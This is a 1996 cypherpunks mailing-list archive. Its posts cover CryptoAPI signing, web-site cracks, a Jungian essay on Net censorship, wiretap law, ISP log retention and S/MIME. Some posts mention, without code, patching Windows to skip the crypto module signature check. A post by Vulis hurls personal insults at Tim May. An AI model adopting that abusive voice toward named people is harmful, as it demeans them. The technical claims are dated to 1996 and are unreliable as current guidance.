Springer-Verlag, 1995, pp.147-157.

[Holl]
N. Jefferies, C. Mitchell, M. Walker, "A Proposed Architecture for
Trusted Third Party Services", Royal Holloway, University of London,
see http://platon.cs.rhbnc.ac.uk

[Mica]
S. Micali, "Fair Public-key Cryptosystems'", Advances in Cryptology -
CRYPTO '92 Proceedings, Springer-Verlag, 1993, pp. 113-138.

[VKT]
E. Verheul, B.J. Koops, H.C.A. van Tilborg, "Binding Cryptography. A
fraud-detectible alternative to key-escrow solutions", Computer Law
and Security Report, January-February 1997, to appear. [*]

[VT]
E. Verheul, H.C.A. van Tilborg, "Binding ElGamal. A fraud-detectible
alternative to key-escrow solutions", will be submitted to
Eurocrypt97.

[*] For the Computer Law and Security Report, send subscription
enquiries, orders and payments to:

Pam Purvey
The Oxford Fulfilment Centre
PO Box 800, Kidlington
Oxford 0X5 1DX  UK
Tel: +44 1865 843373
Fax: +44 1865 843940

For the United States:
Elsevier Advanced Technology
Fulfilment (enquiries)
660 White Plains Road, Tarrytown
New York, NY 10591-5153
USA 
Tel: 914 333 2458

---------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 466 8101
Center for Law, Administration and      facs    +31 13 466 8149
Informatization, Tilburg University     e-mail  E.J.Koops@kub.nl
                  --------------------------------------------------
Postbus 90153    |  This world's just mad enough to have been made  |
5000 LE Tilburg  |    by the Being his beings into being prayed.    |
The Netherlands  |                (Howard Nemerov)                  |
---------------------------------------------------------------------
         http://cwis.kub.nl/~frw/people/koops/bertjaap.htm
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 9 Oct 1996 13:14:20 -0700 (PDT)
To: m5@tivoli.com
Subject: Re: Microsoft CAPI
In-Reply-To: <2.2.32.19961009152246.006be444@netcom8.netcom.com>
Message-ID: <9610092014.AA00842@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally writes:
>  And so what happens when the Microsoft key is compromised?
>  It might be hard to break by purely cryptographic means, but
>  surely there are some people at Microsoft who aren't
>  millionaires.

I ask:  "Who Cares?"  It is easy enough to distribute with the secure-non-GAK  
plug-in a patch for disabling the module authentication.  Heck, you could  
even make an ActiveX applet that did it...


andrew
"Click Here to Download and Install Real Crypto"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Wed, 9 Oct 1996 12:33:25 -0700 (PDT)
To: dlv@bwalk.dm.com
Subject: Re: Recent Web site cracks
Message-ID: <199610091932.PAA12564@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


but even after you get through the firewall, you still need to crack the web host.
i suppose that anyone that would leave their firewall open would not have
very good security on their hosts either.

	-paul


> From cypherpunks-errors@toad.com Wed Oct  9 07:02:07 1996
> To: cypherpunks@toad.com
> Subject: Re: Recent Web site cracks
> From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> Comments: Dole/Kemp '96!
> Date: Tue, 08 Oct 96 16:53:43 EDT
> Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
> Sender: owner-cypherpunks@toad.com
> Content-Length: 307
> 
> stewarts@ix.netcom.com writes:
> > The DOJ and CIA sites were actually cracked; don't know the mechanisms.
> 
> They used firewalls that are known to be easily crackable.
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@hotwired.com (Declan McCullagh)
Date: Thu, 10 Oct 1996 12:49:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: The Alchemical Net
Message-ID: <v0151010aae81c13d1b4a@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain



*****************

Date: Wed, 9 Oct 1996 15:16:38 -0500
To: fight-censorship-announce@vorlon.mit.edu
From: declan@hotwired.com (Declan McCullagh)
Subject: FC: The Alchemical Net
Sender: owner-fight-censorship-announce@vorlon.mit.edu
X-URL: http://www.eff.org/~declan/fight-censorship/
X-JusticeOnCampusURL: http://joc.mit.edu/

This is an essay that talks about about the psychology of
Net-censorship. The writer draws parallels between the architecture of
the Net and the architecture of depth psychology, with particular
emphasis on alchemical symbols. Repressing the Net represses
ourselves. McCullagh studies at the Jung Institute in Philadelphia.
An excerpt from the essay:

"The Net and Web symbols and icons, the mythological names,
the weird links and mirrors, the uncensored slop, the stench
of digital sulfur, the secrecy, the fuss about encryption,
the inside language, the personal signatures, the home pages
and so on,  are the stuff of alchemy.  The world governments
efforts to control this secretive language is no different
than the Church trying to censor medieval alchemists or
religious mystics. The powers always take such actions in
the name of god-fearing decency and the protection of
innocents. The government wants to regulate Net behavior
because it doesnt understand it. They can certainly fake
it, as Dole tried to do in the first debate with Clinton.
T.S. Eliot wrote about the twentieth century citizen as
having the experience but missing the meaning. That is a
description of the 800-pound gorilla government presence in
the Net-terrain. They dont get it. But, in a way, they do.
Even unreflective government ministers realize this Netthing
is bubbling up from somewhere and like Hermes/Mercury, is
forever changing its shape, spots, color, and demeanor.
Suppress a web site in Burma and an alchemical mirror
captures the message in Timbuktu."

-Declan

****************

The Alchemical Net
By Chuck McCullagh <76543.1777@CompuServe.COM>
October 10, 1996

I got interested in the Net about the same time I developed an
interest in alchemy.  Since that time Ive been musing about what
these two protocols, one distinctly medieval, one post-modern, might
have in common.  Both, to borrow the words of writer Flannery
OConnor, draw large and starting figures. Both are agents and
expressions of cultural, psychological, and perhaps even spiritual
transformations.  Both protocols are ostensibly about technology and
process; but ultimately the two protocols are about changes in
technology that can change the inner man.

The protocols can be easily misunderstood.  And they can readily serve
the charlatan seeking the quick buck. Alchemy was originally the
effort to change base metals into gold.  This arcane science predated
chemistry and metallurgy and medieval literature shows how serious
practitioners were about this activity.  For them, alchemy was a
sacred art.  To truly transform base metals into gold, an internal
transformation must also take place, though the process might be
unconscious.  The genuine alchemical artists would understand the poet
Auden's phrase:new styles of architecture, a change of heart. There
had to be the right chemistry between the metallurgical process and
the alchemist.

Alchemy went the way of the dung heap, sent there in part by all the
charlatans who promised get rich schemes.  Today they would be stock
brokers. Chemistry replaced this earthy science.  Three hundred years
later C.G. Jung, the Swiss psychologist, stumbled onto alchemy. After
hearing thousands of his patients' dreams Jung was struck by the
similarity of symbolism in the various dreams. He found arelatedness
among the dream imagery and eventually found similar imagery in
alchemy. He considered dream symbolism a kind of empirical evidence
that man possesses a collective unconscious which houses archetypes
common to mankind.

Jung also discovered that alchemists were interested in personal, as
well as metallurgical, transformation.  Though there were technicians
and charlatans in the business, the real alchemists were
philosophers who were using the witches brew of sulfur, metals, and
whatnot, as a mediation axis for their internal transformation.  They
were actually in search of soul.

But why the charade?  Why engage in ironwork when the true interest is
in soul work? The psychological answer is that the Catholic Church, in
the driver's seat for centuries, has successfully managed to
suppressive the personal and collective unconscious and emphasize
spirit rather than soul.  The Church essentially denied the interior
man and his/her proclivity for symbol-making. Augustine, Aquinas and
the other Church fathers denied the dark side of life. Satan, once the
brother of Christ, was now dethroned.  Evil was merely the absence of
good.  Neat as this might be from a theological perspective, it
absolutely devastated psychological man.  Jung writes that when the
unconscious is suppressed, it erupts as fate.  Our inability to
believe that an evil as great as Hitler could be real, led to the
slaughter of millions.  That the Catholic Church and the Reformers,
who promised much more attention to psychology but failed,  denied
modern man his or her psychology,  sent the activity underground.

The philosopher/alchemists, made wary by Church Inquisitions and
witch burning, went underground and developed a delicious
pre-industrial protocol to disguise a psychological activity.  As Jung
has noted, the changing of base metals into gold is really a metaphor
for the individuation process, during which a person becomes fully
integrated and whole. The alchemists were an industrial offshoot of
the mystical tradition, perhaps best represented by Meister Eckhart of
Germany, that believed, as the Greeks did, he who knows himself,
knows God. Such a position was anathema to the Church which held the
keys to the kingdom. No wonder alchemists went underground.

Alchemy was finally done in by the powerful worlds of rationalism
and empiricism that denied the unconscious.  If you couldnt measure
something, it wasnt real.  Our world today is a product of these
movements.  Most of our cultural ailments, whether consumerism,
materialism, nihilism, fundamentalism, or extremism of any kind,  have
their origins in the psychology of rational and empirical Americans.
The spiritual despair so many people feel today is due to the denial
of the soul and the failure of the old religious symbols to speak to
us at the end of the 20th century.  As the rap song goes,  Denial,
Anns just a river in Egypt.

It is a principle of depth psychology that what a culture represses,
comes back as fate.  Our collective inability to accept the very real
presence of evil in the world (and in ourselves and in our icon gods)
has given us a brutal century which will likely close the way it
began--in bloodshed.   The pathetic, simple-minded political discourse
in this country only underscores our lack of reflection.  American and
world institutions are scared shuttles of the NET, not because they
cant control it but because, from a psychological point-of-view, it
is the animals emerging out of the collective unconscious.

In terms of digital exchange, the NET was probably inevitable.  Im
less interested in the Net as a overlay of technical protocols than
the Net as a projection of depth psychology replete with its own
cultural icons and alchemical  processes.  The alchemical language
was archaic, symbolic, suggestive, designed that way so the
authorities could not easily decipher.  It was a game of sulfur
handshakes and smoky mirrors. The factory floor was smelled of Yeats
foul rag and bone shop of the heart. The alchemists knew the stench
of excrement.  They were that too.

The Net and Web symbols and icons,  the mythological names, the weird
links and mirrors, the uncensored slop, the stench of digital sulfur,
the secrecy, the fuss about encryption, the inside language, the
personal signatures, the home pages and so on,  are the stuff of
alchemy.  The world governments efforts to control this secretive
language is no different than the Church trying to censor medieval
alchemists or religious mystics.  The powers always take such actions
in the name of god-fearing decency and the protection of innocents.
The government wants to regulate Net behavior because it doesnt
understand it. They can certainly fake it, as Dole tried to do in the
first debate with Clinton.  T.S. Eliot wrote about the twentieth
century citizen as having the experience but missing the meaning. That
is a description of the 800-pound gorilla government presence in the
Net-terrain. They dont get it. But, in a way, they do.  Even
unreflective government ministers realize this Netthing is bubbling up
from somewhere and like Hermes/Mercury, is forever changing its shape,
spots, color, and demeanor.  Suppress a web site in Burma and an
alchemical mirror captures the message in Timbuktu.

Whatever the Net is technologically, it also represents a
psychological space where transactions of the soul and spirit take
place. Yes, its messy, god knows its messy. But so were the
alchemists attempts to turn base metals into gold. So is the
psychological process of individuation which is a life journey for us
all.  Psychologist James Hillman, updating Jung writes, In my
symptoms is my soul.  Life is a mess and that is reflected on the
Net.  Neither religion nor the state encourages psychological
development.  Instead both encourage wars to fight for anthropomorphic
god we have projected into the heavens.

The symbols that are passed on to us by tradition (Christ, Virgin
Mary,  the saints) are made clean by tradition and  are rid of the
shadows of the unconscious.  Our presidents, saints, and cultural
icons are elevated and become etherized on the table of history.  The
conscious mind wants order. impeccable grammar, and Jefferson without
his black mistress.  The unconscious mind serves up dreams in
alchemical dress that scare the hell out of us.  That is, if we are
awake.  That  this is a manifestation of depth psychology with its
lions, tigers, and dream corridors worries  the guardians of the
conscious state.  So they propose their own protocols, wrapped in the
white flag of decency.  The authorities want to repress the Net
because it is a projection of their own unconscious. They dont want
to enter that terrain.  They will certainly stand tall against
pedophiles but will refuse to see the Net as a journey they must to
take.

Alchemists had rigorous protocols of mixing elements to get the right
elixir. But their work was not programmatic,  for that approach would
satisfy the conscious mind.  Rather alchemists relied more on
intuition and magical clues, finding hints and links during the soul
journey.  The objective was always transformation; taking the
unprocessed substances and combining them in such a way as to bring
about the desired end which, in psychological terms, was the
development of the Self, the whole person.  A basic principle of
alchemy was that the basic materials had to be combined and processed
the  same way Jungians believe raw dream material has to be subjected
to a critical analysis.

A technical need gave birth to the Net.  However, the Net also
answered a psychological need.  Again, what the conscious mind
represses, returns as fate or culture.  Modern man is both liberated
and enslaved. The institutions that purport to serve him has denied
him access to the unconscious, the royal road to the soul.  Alchemists
knew intuitively what analytical psychologists know empirically; that
is, the unconscious is more responsive to the spontaneous attitudes
associated with the young.  This is what has perplexed and scared so
many in authorities. The young are vigorously responding to this
invitation from the unconscious to develop the mysterious tools and
protocols that will, as the fantasy goes, transform the world and
perhaps themselves.  For some the Net is really about ontology, the
nature of being itself.  It is a mirror that invites a very different
view of man.  He or she is no only digital, world at the fingertip;
this emerging tech-head  renders obsolete most institutions associated
with paternalism. Free speech is really free.  A literate,
enfranchised, ennobled citizen can be a reality.  More profoundly, the
collective psychology is changing. The boundaries that define and
confine are less important. On the Net nationalism takes on a very
petty glow. Netizens have the potential of living their lives
symbolically  in that they are always linked to the other.

Of course, the Net is also a junk yard filled with tons of stuff that
must be subjected to the right touch of alchemy. The process is about
process and realizing one must interact with the untutored material.
The Net is certainly a solipsistic zone of personal chatter. But this
chatter has an alchemical role in that  it allows the base material to
show forth to be transformed. The impulse to censor the Net argues
against the Nets psychological benefits.

Alchemy described a technological process that was also about personal
transformation.  The psychological aim was wholeness and integration
of the Self.  The Net is  a technical protocol that permits the
transfer of unlimited amounts of  digital date. But the Net
architecture is also a manifestation of depth psychology that has the
potential of ordering the world in a much more soulful way.

###


-------------------------------------------------------------------------
fight-censorship is at http://www.eff.org/~declan/fight-censorship/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 9 Oct 1996 12:52:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Microsoft CAPI
Message-ID: <199610091952.MAA16556@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Ravi Pandya wrote:
> > ... You can't load an encryption engine into Windows 95 or 
> > Windows NT unless that engine has been specially signed by 
> > Microsoft's corporate key.
> 
> And so what happens when the Microsoft key is compromised?  It might
> be hard to break by purely cryptographic means, but surely there are
> some people at Microsoft who aren't millionaires.

Much easier would be to patch the OS to disable the signature check
by the CryptoAPI. A patching program, once written, would require no
particular skill to run.

Sort of like 'rechipping' a high-end sportscar.



Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Butler, Scott" <SButler@chemson.com>
Date: Wed, 9 Oct 1996 06:52:50 -0700 (PDT)
To: "'IMCEAX400-c=GB+3Ba=+20+3Bp=CHEMSON+3Bo=CSH+3Bdda+3ASMTP=cypherpunks+40toad+2Ecom+3B@chemson.com>
Subject: L.Detwieler
Message-ID: <c=GB%a=_%p=CHEMSON%l=CSH_NT0-961009135410Z-1218@csa-ntx.chemson.com>
MIME-Version: 1.0
Content-Type: text/plain


Clipped from WELCOME TO CYPHERPUNKS
>The cypherpunks list has its very own net.loon, a fellow named L.
>Detweiler.  The history is too long for here

Can anyone give me the details of The History of this character and wot
he is on about




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Butler, Scott" <SButler@chemson.com>
Date: Wed, 9 Oct 1996 06:56:14 -0700 (PDT)
To: "'IMCEAX400-c=GB+3Ba=+20+3Bp=CHEMSON+3Bo=CSH+3Bdda+3ASMTP=cypherpunks+40toad+2Ecom+3B@chemson.com>
Subject: L.Detwieler
Message-ID: <c=GB%a=_%p=CHEMSON%l=CSH_NT0-961009135722Z-1221@csa-ntx.chemson.com>
MIME-Version: 1.0
Content-Type: text/plain


Clipped from WELCOME TO CYPHERPUNKS
>The cypherpunks list has its very own net.loon, a fellow named L.
>Detweiler.  The history is too long for here

Can anyone give me the details of The History of this character and wot
he is on about

TIA Scott
{:-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Filacchione <alexf@iss.net>
Date: Wed, 9 Oct 1996 13:09:57 -0700 (PDT)
To: "cypherpunks@toad.com>
Subject: RE: "Soul Catcher" Computer Chip (fwd)
Message-ID: <01BBB5FC.3769FEA0@alexf.iss.net>
MIME-Version: 1.0
Content-Type: text/plain



QUOTE

SOUL CATCHER IMPLANTS

British scientists are developing a concept for a computer chip
which, when implanted into the skull behind the eye, will be able to
record a person's every life time thought ands sensation.

=-=-=-=-=-=-

Hahaha!  That's a good one.  Maybe these guys should share some of their 
findings w/ the worlds leading neurologists, since they seem to know so 
much.  "Every lifetime thought"??????  Even one thought.  Hmmm, perhaps 
they would care to explain human emotions in scientific terms, fully 
explained, no vagueness allowed?  Care to share "translation tables" for 
neuro-electric impulses that show signature of certain emotions?  This is 
just so ridiculous.  I would just like to ask them one question.  "How?" 
 Record what someone sees?  Maybe....

Alex F
alexf@iss.net







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 9 Oct 1996 13:37:40 -0700 (PDT)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <199610091828.LAA13994@netcom6.netcom.com>
Message-ID: <Pine.SUN.3.94.961009160249.26562A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 9 Oct 1996, Vladimir Z. Nuri wrote:

> 
> Unicorn writes:
> 
> [challenging wiretap laws]
> >And we seasoned lawyers, three of us last I counted, told you that you
> >were an idiot for suggesting it.  I guess we hurt your feelings because
> >you turned around and asked for a "civilized" lawyer.  (Read: one who will
> >listen to your ranting).  You wanted a legal opinion, you got more than
> >one. Now go away.
> 
> look, I was not going to rub this in your face at all, but you don't
> seem to have a clue about this. the fact that you/others here can't 
> scrounge enough imagination to come up with an attack against wiretap laws 
> based on case law and think such a think is a waste of time
> is pretty meaningless in your case. I don't think
> you have an imaginative bone in your body, hence the great vitriol
> that you unleash upon me whenever I use my own.

Well "Vlad," as the most creative lawyer on the list, it seems it's up
to you to get us out of this mess we are in.  I'm certainly not biting the
bait and researching the topic for you because you call me unimaginative.

Clearly no one on the list cares.  Perhaps you should look elsewhere for
your support (hint hint).

> from the article just recently posted:
> 
> >
> >http://www.sfgate.com/cgi-bin/examiner/article.cgi?year=1996&month=10&day=06&art
> >icle=BUSINESS2814.dtl
> >
> >Encryption controversy pits life against liberty
> 
> >"Wiretapping is the main issue," said Stewart Baker, former general counsel
> >of the National Security Agency, the CIA's code-breaking and eavesdroping
> >cousin.
> 
> as TCM just pointed out, this is a departure on the part of the administration
> in describing the tactics of clipper. clearly, WIRETAPPING AUTHORITY IS
> KEY TO CLIPPER LEGITIMACY. hence a legal challenge to wiretapping is an
> extremely critical angle to the situation.

"Newtonian Science is the KEY TO TRAVEL TO THE MOON.  Hence a challenge to
newtonian Science is an extremely critical angle to the situation.

Note the similarities.  1> We've already been to the moon.  2> Newtonian
Science is unlikely to be argued away in a way that will negate moon
travel any time soon.

I understand that it's difficult for you to grasp how firmly entrenched
the concept of wiretapping is in law enforcement, courts and the
legislature, and that your novel new approach has been tried before.
Part of the reason its hard for you to understand is because you haven't
bothered to go check.  Instead you have to look for civil libertarian
lawyers to try and say what you can't because you haven't looked.

You repeating your claim over and over again isn't going to get me to lift
a finger to research it for you.  You've been given several suggestions as
to where to look to show the massive holes in your claim in about five
minutes.  I think if you were to give it a try you would redden quite
quickly on realizing how hard us "imaginationless" lawyers were laughing
at you all this time.

> >"If two criminals are discussing a plot over the telephone and we have a
> >wiretap order, the encryption would negate the wiretap," said Michael
> >Vatis, a senior Department of Justice official.
> >
> ...
> 
> >"For serious investigations involving terrorists or organized crime . . .
> >where you're worried about hundreds of people being killed . . . the whole
> >point is to keep the investigation secret or the whole thing blows up," he
> >said.
> 
> as I just recently wrote, it seems to me one of the key points of discussion
> that is just now emerging in this debate is the demand by the gov't
> that wiretapping be done IN SECRET without knowledge of the suspect,

This is nothing new "Vlad."  It's been a point of contention for over 50
years and a well settled one for the last 25-30.  Go look it up.

I also call upon you to look at the sources of these claims.  Stewart
Baker, now at Steptoe and Johnson, formerly of the NSA, heard speaking at
the ABA Conference on Law Enforcement and Intelligence.  Michael Vatis,
also heard speaking at the ABA Conference, sidekick of Gorelick and young
shining star in the Justice Department.  These are the people who will
benefit from associating wiretap and crypto because wiretap is extremely
unlikely to be challenged as an investigative tool in any way shape or
form.  These are the arguments of the law enforcement side.

You are shooting crypto in the foot if you allow wiretapping into the
argument.  You are doing more damage than good.

> whereas civil libertarians seem to be challenging this point in particular.
> it could be a magic bullet it defeating wiretapping. it seems to really
> get to the core of the debate about key escrow etc.

No, what gets to the core of the debate about key escrow is whether strong
encryption which does not comply will be made illegal to possess or use.
This is a meaningless detour and a waste of time.  So much so that I
wonder if you are not working for some local agency (I say local because
your posts are simply not crafty enough to be any kind of concerted
disinformation attempt on the part of authorities with wider briefs).

Meaningful attempts to derail Clipper will come along the same lines they
always have.  Economic objections made by industry and challenges to
thinly stretched regulations like ITAR which have been untested in the
vein before.  Revamping the country's entire wiretap law is not only a far
fetched project, its nearly a wild goose chase.  Please take it elsewhere.

> >Not so, argued Daniel Weitzner, an attorney with the civil libertarian
> >Center for Democracy and Technology inWashington, D.C. Forgetting
> >encryption for a moment, Weitzner said, a wiretap is unlike any other tool
> >in the
> >investigator's arsenal.
> >
> >"To get documents sitting on my computer, the FBI has to come into my
> >office with a search warrant," Weitzner said. "I have to know about it."
> 
> the same distinction again. very interesting.  I was just emphasizing
> that in my post.

Notice, however, that he doesn't suggest trying to overturn the wiretap
laws to get at Clipper.  Same distinction there too.

Law enforcement says "We need this power" attorneys with the Center for
Democracy and Technology (which by the way, while "Vlad" respects in
terms of legal prowess, I do not) whine "But they never should have
gotten wiretap technology in the first place."

You really thing that's a positive argument?  Go for it.  Dedicate your
life to the subject.  You have all my encouragement.

> >Exactly the reverse is true for a wiretap. To be effective, the subject
> >must be ignorant of the tap. Weitzner said this
> >notion of a "secret search" went against a central principle of the Fourth
> >Amendment, which protects people from
> >unreasonable search and seizure.
> 
> whoa, apparently this would be news to Unicorn, who thinks it would be
> a waste of time to argue against the established legitimacy of wiretapping
> and considers himself a premiere lawyer-dude.  well, I'll just let Unicorn
> argue with Weitzner, (whose credentials are rather impressive and I 
> trust more, btw..)  I'd be interested to hear what Weitzner says, 
> Uni...

I won't be talking to Weitzner obviously.  It a losing man's argument.
"We wouldn't be in the mess we are in now if the Supreme Court hadn't
gelded the 4th amendment in the early years of its development."

Good luck.

If Weitzner's credentials are so impressive, why isn't he in private
practice where the big money and influence are?  That's where Stewart
Baker is.  That's where Gorelick is heading.  That's where Freeh is
headed, and it's what Vatis will be up to in 3 years time.

> so what we have here is a very knowledgeable lawyer who has helped
> out EFF argue that wiretaps are unconstitutional based on the precise
> aspect that I was focusing on in a post that Unicorn flamed me for:
> that they are secret, unknown to the suspect,
> and that this thereby might constitute an "unreasonable"
> search and seizure. I don't claim to have originated this of course, but
> I was emphasizing it in my post, and Unicorn objected.

Then it seems you should take the discussion to the great legal mind of
our times, Weitzner, rather than waste our time and bandwidth with it.

> reading what Weitzner wrote, it is not inconceivable to imagine
> him having the position that wiretaps in their present form might
> not survive a court challenge, i.e. it would at least not be
> a waste of time to mount such a case, as Unicorn belligerently
> bellows above is obvious to anyone with a smidgeon of legal
> background..

So call him and foster such a challenge "Vlad."

I'm anxious to hear about your progress.

Oh, speaking of which, what happened to your super-clever ISP encrypts
every peices of mail that comes in idea?  I don't see it mentioned here.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 9 Oct 1996 14:25:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Forward Privacy" for ISPs and Customers
In-Reply-To: <v03007802ae819385a300@[207.167.93.63]>
Message-ID: <Pine.LNX.3.95.961009171647.683B-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 9 Oct 1996, Timothy C. May wrote:

> Back to the legal issue. Perhaps the Digital Telephony Act will be
> interpreted to require ISPs to make their systems "tappable," possibly by
> adding message logging. possibly just by offering access to the T1s and T3s
> only ("OK, Feds, here's where the T3 enters the building...be careful you
> don't cut the core, OK?").

I think there is a section of DT that explicitly excludes ISP's.
Of course, this can, and probably will be, changed.

Mark
--
finger -l for key
PGP encrypted mail prefered.

Good signature from user "Mark Miller 2048-bit key <markm@voicenet.com>".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>
Date: Wed, 9 Oct 1996 15:26:49 -0700 (PDT)
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Forward Privacy" for ISPs and Customers
In-Reply-To: <v03007802ae819385a300@[207.167.93.63]>
Message-ID: <325c26935621002@noc.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May said:
> However, there are certain things my phone company does *not* do. They
> don't keep _copies_ (recordings) of my phone conversations. This means a
> court order can't yield copies of past conversations. They also don't track
> incoming phone calls to me. (I don't believe such records of incoming phone
> calls are kept; maybe I'm wrong. Certainly with Caller ID, storing incoming
> phone numbers is possible....I just don't think local or regional phone
> companies care about such records, and hence don't bother to accumulate
> them.)

I had heard through the grapevine about a year ago that US West (the
local Phone Monopoly) was required to turn over a list of all phones
that called a certain local number. I don't recall what the details,
but it implies that records of calls (from, to, possibly duration) are
kept at least for a time.

> Something ISPs could do--and may do if there is sufficient customer
> pressure--is to adopt a policy of "forward secrecy" (to slightly abuse this
> technical term). That is, to have an explicit policy--implemented in the
> software--of _really_ deleting the back messages once a customer downloads
> them to his site. This means that _backups_ must be done in a careful
> manner, such that even the backup tapes or disks are affected by a removal.

Interesting thought, but it fails when it gets to my scale. It would
be trivial to exclude a file or set of files from normal backup, but
it would be problematic to exclude files from filesystem dumps, etc.
The scale I deal with (40,000 users, 12gb of /home directory files and
about the same in the mail spool) would make it almost impossible to
provide this service with accuracy to my users.

> But if no logs and backup tapes of mail are kept, at least the job of
> gaining access to communications is made more difficult.

I've been concerned about system logging on remailers, and what kind of
traffic details they could leave. If a remailer operator doesn't control
the machine that the remailer runs on, there can be no guarantee that 
traffic information is unavailable to someone with a warrant or a gun.
It wouldn't be to much of a stretch to imagine a coordinated raid of
all remailers, to "capture a terrorist ring" or some other likely
excuse.

-- 
Kevin L. Prigge                     | Some mornings, it's just not worth
Systems Software Programmer         | chewing through the leather straps.
Internet Enterprise - OIT           | - Emo Phillips
University of Minnesota             |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Rodger <rodger@interramp.com>
Date: Wed, 9 Oct 1996 14:43:29 -0700 (PDT)
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: FC97: Anguilla, Anyone?
Message-ID: <1.5.4.32.19961009214008.006cfa24@pop3.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


Yup - I did get the July blurb - of you do send me one, make sure it's updated.


Will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 9 Oct 1996 19:08:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Tim May is a fine person.
In-Reply-To: <199610082321.QAA01224@miron.vip.best.com>
Message-ID: <TqXJVD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ha ha ha! Timmy May really lost it. Now he spams this mailing list with
"anonymous" rants, praising himself in third person. He is pathetic.

I'd almost feel sorry for Timmy May if he weren't such an ignorant, arrogant,
obnoxious, loud-mouthed jerk.

anonymous@miron.vip.best.com writes:

> Tim May is a fine person. You people should not
> be sending out some many negative vibes. We all
> owe Tim a gread debt for his help an advancing cryptography.

Timmy May doesn't know shit about cryptography. He wouldn't know a public key
cryptosystem from a man-in-the-middle attack if one of them bit him on his ass.

Timmy has no life. That's why he floods this mailing list with his stupid
off-topic rants.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Wed, 9 Oct 1996 18:08:22 -0700 (PDT)
To: "ratak (Jason E.J. Manaigre)" <ratak@escape.ca>
Subject: Re: pgp, edi, s/mime
In-Reply-To: <199610091521.KAA26969@wpg-01.escape.ca>
Message-ID: <325C4BCA.190F46FC@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


ratak (Jason E.J. Manaigre) wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Mime-Version: 1.0
> Content-Type: text/plain
> Content-Transfer-Encoding: 7bit
> 
> To: jubois@netcom.com, cypherpunks@toad.com
> Date: Wed Oct 09 10:19:39 1996
> t:
> >
> > - S/MIME and PGP are the two leading candidates for encrypting EDI
> >  messages,
> > S/MIME inside the US, and PGP outside the US where S/MIME is unavailable.
> >
> 
>         How far along has S/Mime come now, can they offer the same key sizes
> as PGP...?

S/MIME has come a _long_ way. An earlier version (now called S/MIME 1.0,
although I'm not sure this is going to make it into any marketing
materials) had a couple of cryptographic problems compared with PGP.
Those problems have been fixed in version 2.0, which is expected shortly
(as an internet draft).

S/MIME 2.0 _defaults_ to 168-bit triple-DES, unless you're stupid enough
to use the export version. RSA key sizes up to 2048 bits are supported,
as are a number of alternate symmetric algorithms. In addition, digital
signatures are based on 160-biy SHA1, rather than 128-bit MD5, which is
half broken anyway.

In the meantime, Deming software is shipping a slick Windows
implementation of S/MIME, which integrates nicely with Eudora. Netscape
is expected to ship cross-platform S/MIME capability in version 4.0 of
Navigator (their original publicity materials were only off by a factor
of two ;-), and that will make a huge dent in the market.

In sum, S/MIME leaves PGP in the dust, both techically and as a market
force. There's still a lot of sentiment that PGP is one of "ours" and
S/MIME is one of theirs, but at this point it's the latter that has the
most promise of bringing encrypted e-mail to the masses.

If only X.509 weren't so darned ugly :-)

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 9 Oct 1996 19:08:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: L.Detwieler
